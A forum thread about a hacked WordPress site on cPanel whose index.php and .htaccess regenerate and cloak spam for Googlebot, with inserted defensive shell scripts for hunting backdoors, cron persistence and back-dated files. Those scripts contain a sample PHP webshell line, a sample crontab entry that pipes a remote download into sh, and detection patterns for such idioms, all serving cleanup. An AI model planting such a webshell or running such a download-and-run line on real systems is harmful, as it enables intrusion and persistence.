Compromised website index.php regenerating itself

Discussion in 'Security' started by Adiie9, Apr 21, 2019.

  1. Adiie9

    Adiie9 Registered

    Joined:
    Apr 21, 2019
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Karachi, Pakistan
    cPanel Access Level:
    Root Administrator
    Hi,

    Two days ago I found SHELL files in the /public_html/ folder, and the same day our emails stopped working and are still not working. The email folders are in /mail/example.com/, but cPanel is not showing any email except the ones I have created for temporary use.

    Secondly, the website is based on WP, and due to an old version of a plugin (or plugins), SHELL files somehow got uploaded. Now even if I delete index.php, it gets regenerated by itself, and even if I modify it and view it again, the code is there.
    .htaccess gets the code again and again, even after modifying it.
    I have cleaned up /public_html/ and the plugins have been updated, but these two files (index.php and .htaccess) are still messing things up.

    The .htaccess has this code:
    RewriteRule ^(mixolydian)\/([0-9]+)\/([0-9]+)\/(.*)$ ?mixolydian$2=$3&%{QUERY_STRING} [L]

    If I open the website in a browser, it works fine, but if I fetch the website as Googlebot, it shows content in Chinese.
     
  2. sparek-3

    sparek-3 Well-Known Member

    Joined:
    Aug 10, 2002
    Messages:
    1,923
    Likes Received:
    177
    Trophy Points:
    343
    cPanel Access Level:
    Root Administrator
    Did you check for other backdoor scripts on the account?

    Did you check for other admin users on the WordPress script?

    Have you verified that the admin users on the WordPress script did not have their passwords changed or compromised?

    The sad part is... once you are compromised, everything falls into question. What all did the compromisers tamper with? That's a difficult (impossible?) question to answer. There's no magic bullet that is going to fix everything after a compromise. Which is why an ounce of prevention is worth a pound of cure.
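Added example, not code from the thread or from any of its posters: a short shell audit for the situation in the first two posts. It greps the document root for the token in the injected rewrite rule and for common PHP backdoor idioms (the "other backdoor scripts" sparek-3 asks about), lists PHP files dropped into the uploads tree, emulates the posted RewriteRule to show what the doorway URLs look like, and reproduces the Googlebot-vs-browser comparison. The docroot path, the function names, the pattern list and the sample files it builds are this example's own assumptions; only the "mixolydian" token and the rule come from the post.

```shell
#!/bin/sh
# Added example, not from the thread: hunt for the source of re-injected
# index.php/.htaccess content in a WordPress docroot and reproduce the
# Googlebot cloaking check. Function names, patterns and the sample tree
# are this example's own choices (hypothetical).

# Files under $1 containing the marker ($2, default "mixolydian") or common
# PHP backdoor idioms: eval of decoded payloads, request parameters executed
# as code, shell commands fed from request parameters. One path per line.
scan_backdoors() {
    docroot="$1"
    marker="${2:-mixolydian}"
    grep -rlIE \
        -e "$marker" \
        -e 'eval *\( *(base64_decode|gzinflate|gzuncompress|str_rot13|strrev)' \
        -e '(preg_replace *\(.*/e|assert *\( *\$_(GET|POST|REQUEST|COOKIE))' \
        -e '\$_(GET|POST|REQUEST|COOKIE)\[[^]]*\] *\(' \
        -e '(system|passthru|shell_exec|popen|proc_open) *\( *\$_(GET|POST|REQUEST)' \
        "$docroot" 2>/dev/null | sort -u
}

# PHP files inside the uploads tree. WordPress never stores PHP there, so
# any hit is almost certainly a dropped webshell.
php_in_uploads() {
    find "$1/wp-content/uploads" -type f \
        \( -name '*.php' -o -name '*.phtml' -o -name '*.php[0-9]' \) 2>/dev/null | sort
}

# Emulate the posted RewriteRule on a request path: /mixolydian/12/34/anything
# is served by the directory index (the infected index.php) with the query
# string mixolydian12=34, which is how the spam doorway pages are addressed.
rewrite_doorway() {
    printf '%s\n' "$1" | sed -E 's#^/?(mixolydian)/([0-9]+)/([0-9]+)/(.*)$#?\1\2=\3#'
}

# Fetch a URL as a browser and as Googlebot; succeed when the bodies differ,
# which is the cloaking symptom from the post. Needs network access, so the
# offline test does not call it.
cloaking_differs() {
    url="$1"
    ua_browser='Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36'
    ua_bot='Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
    h1=$(curl -sSL -A "$ua_browser" "$url" | cksum)
    h2=$(curl -sSL -A "$ua_bot" "$url" | cksum)
    [ "$h1" != "$h2" ]
}

# Constructed sample docroot: one clean file, one webshell in uploads, and a
# .htaccess carrying the posted rule. Prints the directory it created.
make_sample_docroot() {
    dir=$(mktemp -d)
    mkdir -p "$dir/wp-content/uploads/2019/04"
    printf '<?php echo "hello"; ?>\n' > "$dir/clean.php"
    printf '<?php eval(base64_decode($_POST["x"])); ?>\n' \
        > "$dir/wp-content/uploads/2019/04/shell.php"
    printf 'RewriteRule ^(mixolydian)\\/([0-9]+)\\/([0-9]+)\\/(.*)$ ?mixolydian$2=$3&%%{QUERY_STRING} [L]\n' \
        > "$dir/.htaccess"
    printf '%s\n' "$dir"
}
```

Usage on a live account: `scan_backdoors /home/account/public_html`, `php_in_uploads /home/account/public_html`, then `cloaking_differs https://example.com/` and `rewrite_doorway /mixolydian/12/34/x` to confirm what the rule does. The pattern list is deliberately broad; review hits by hand rather than deleting on sight, and remember that a file regenerated seconds after deletion points at something still running (a process, a cron job, or a plugin hook), not just a leftover file.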
     
  3. GOT

    GOT Get Proactive! PartnerNOC

    Joined:
    Apr 8, 2003
    Messages:
    1,484
    Likes Received:
    187
    Trophy Points:
    193
    Location:
    Chesapeake, VA
    cPanel Access Level:
    DataCenter Provider
    Check to see if any cron jobs were added. We see that a lot.
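Added example, not code from the thread or from GOT: a cron audit that covers every place a cron job can be planted on a cPanel/Linux host (per-user spools, /etc/crontab, /etc/cron.d and the periodic directories) and flags the entry shapes that typically reinstall web malware. The flagging patterns, the function names and the sample crontab (with a documentation-range IP) are this example's own constructed choices.

```shell
#!/bin/sh
# Added example, not from the thread: enumerate cron-based persistence on a
# cPanel/Linux server and flag suspicious entries. The system paths are the
# standard locations; patterns, function names and the sample crontab are
# this example's own constructed choices (hypothetical).

# Print the suspicious lines of crontab text read on stdin: download-and-run
# pipelines, inline perl/python/php one-liners, decoded base64 payloads, jobs
# living in world-writable temp dirs, and anything touching a docroot.
flag_cron_lines() {
    grep -vE '^[[:space:]]*(#|$)' | grep -E \
        -e '(curl|wget|fetch)[^|]*\|[[:space:]]*(sh|bash|perl|python|php)' \
        -e 'base64 *(-d|--decode)' \
        -e '(perl|python[0-9.]*|php) +-[ecr] ' \
        -e '/tmp/|/dev/shm/|/var/tmp/' \
        -e 'public_html|/var/www/'
}

# Every crontab file that exists on this host. Per-user spools cover cPanel
# accounts; run as root to read them all. at(1) jobs and systemd timers are
# separate mechanisms: check "atq" and "systemctl list-timers --all" too.
cron_sources() {
    for f in /var/spool/cron/* /var/spool/cron/crontabs/* /etc/crontab \
             /etc/cron.d/* /etc/cron.hourly/* /etc/cron.daily/* \
             /etc/cron.weekly/* /etc/cron.monthly/* /etc/anacrontab; do
        [ -f "$f" ] && printf '%s\n' "$f"
    done
    return 0
}

# Audit the live system, prefixing each flagged line with its file name.
audit_live_crons() {
    cron_sources | while IFS= read -r f; do
        flag_cron_lines < "$f" | sed "s#^#$f: #"
    done
}

# Constructed sample crontab: one legitimate cPanel job, a download-and-run
# job, a perl one-liner at boot, and a job inside a docroot.
# 203.0.113.5 is a documentation address, not a real host.
SAMPLE_CRONTAB='# m h dom mon dow command
0 3 * * * /usr/local/cpanel/scripts/upcp --cron
*/5 * * * * curl -s http://203.0.113.5/x.txt | sh
@reboot /usr/bin/perl -e 1
15 * * * * cd /home/user/public_html && php wp-cron.php'

# Run the flagging rules over the sample; three of the four jobs are reported.
demo_flags() {
    printf '%s\n' "$SAMPLE_CRONTAB" | flag_cron_lines
}

demo_flags
```

The docroot pattern will also flag a legitimate `wp-cron.php` job, which is intended: after a compromise every job that executes code from the web tree deserves a look. In WHM the per-account spools under /var/spool/cron are the authoritative list; the cPanel "Cron Jobs" page only shows the one account you are logged into.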
     
  4. Adiie9

    Adiie9 Registered

    Joined:
    Apr 21, 2019
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Karachi, Pakistan
    cPanel Access Level:
    Root Administrator
    I asked Bluehost to run a scan on the account, and they found only .htaccess and index.php containing malware, but I think there could be hidden script files in /public_html/, and I am trying to find and remove them.

    I still have admin access to WP and the password is still the same. There are no other admin accounts in WP. I have also changed the WP admin, WHM and cPanel (of the main domain) passwords of the compromised account.

    I don't see any new cron jobs added in cPanel, and I don't know how to check via WHM, as it only shows me a "Configure cPanel Cron Jobs" option under settings.

    I renamed public_html to public_html_LIVE and created a new public_html folder, and the server immediately created index.php, .htaccess and robots.txt.
    Any idea how they are being created? Also, the file dates are Mar 17, 2018.
     
    #4 Adiie9, Apr 21, 2019
    Last edited by a moderator: Apr 21, 2019
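Added example, not code from the thread: the post above reports files that appeared seconds after an empty public_html was created yet carry a 2018 modification date. A shell check like the one below separates a genuinely old file from a back-dated one by comparing mtime with the inode change time, which userland cannot set. The function names, the 7-day threshold and the sample tree it builds are this example's own assumptions.

```shell
#!/bin/sh
# Added example, not from the thread: tell a genuinely old file from one whose
# modification time was back-dated. touch(1), cp -p and tar can set mtime, but
# the inode change time (ctime) is written by the kernel on every write,
# rename or chmod and cannot be set from userland, so a file that "appeared"
# seconds ago with a 2018 mtime shows a ctime far newer than its mtime.
# Function names, threshold and sample tree are this example's own choices.

# Epoch seconds of mtime and ctime (GNU stat, falling back to BSD/macOS stat).
file_times() {
    stat -c '%Y %Z' "$1" 2>/dev/null || stat -f '%m %c' "$1"
}

# Files under $1 whose ctime is more than $2 days (default 7) newer than their
# mtime: candidates for back-dated timestamps.
find_backdated() {
    root="$1"; days="${2:-7}"
    limit=$((days * 86400))
    find "$root" -type f | while IFS= read -r f; do
        set -- $(file_times "$f")
        if [ $(($2 - $1)) -gt "$limit" ]; then
            printf '%s\n' "$f"
        fi
    done
}

# Files under $1 whose inode changed within the last $2 days (default 1),
# whatever their claimed mtime says. Cheap first pass on a whole account.
recently_changed() {
    find "$1" -type f -ctime "-${2:-1}"
}

# Constructed sample tree: one fresh file and one whose mtime is set back to
# 2018-03-17, the date reported in the post. Prints the directory it created.
make_sample_tree() {
    dir=$(mktemp -d)
    printf '<?php\n' > "$dir/fresh.php"
    printf '<?php\n' > "$dir/index.php"
    touch -t 201803170000 "$dir/index.php"
    printf '%s\n' "$dir"
}
```

On the live account, `find_backdated /home/account/public_html` and `recently_changed /home/account/public_html 2` give a list to inspect with `stat`. To catch whatever writes the files, watch the directory while recreating it (`inotifywait -m -e create,modify,attrib public_html`, from inotify-tools) and list the account's processes at the same moment with `ps -u account -f`; a writer that appears within seconds is a running process, not a stray file.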
  5. GOT

    GOT Get Proactive! PartnerNOC

    Joined:
    Apr 8, 2003
    Messages:
    1,484
    Likes Received:
    187
    Trophy Points:
    193
    Location:
    Chesapeake, VA
    cPanel Access Level:
    DataCenter Provider
    Unfortunately, no, I can't tell how they are getting created based on the information presented.

    Your host should provide you with more assistance if your site keeps getting re-infected, and/or resubmit to Sucuri for cleaning.
     
  6. Adiie9

    Adiie9 Registered

    Joined:
    Apr 21, 2019
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Karachi, Pakistan
    cPanel Access Level:
    Root Administrator
    Hi,

    Thank you for your response. I tried to clean with Sucuri, but it found only index.php and .htaccess infected, and also an old version of the Gravity Forms plugin (which is the real culprit).
    The email issue has been resolved by the hosting provider; the shadow file had been changed by the hackers.
    I have raised a ticket to resolve the index.php and .htaccess issue, and I hope they resolve it soon.
     
  7. cPanelLauren

    cPanelLauren Forums Analyst II Staff Member

    Joined:
    Nov 14, 2017
    Messages:
    6,464
    Likes Received:
    505
    Trophy Points:
    263
    Location:
    Houston
    cPanel Access Level:
    DataCenter Provider
    Hi @Adiie9

    Let us know if there's anything further we can assist with once you hear back from your provider on the ticket you opened.


    Thanks!
     
  8. Adiie9

    Adiie9 Registered

    Joined:
    Apr 21, 2019
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Karachi, Pakistan
    cPanel Access Level:
    Root Administrator
    Hi,

    I am still waiting for Bluehost to resolve this matter, and in the meantime I am digging into the directories to find the script or source that is causing the issue.
     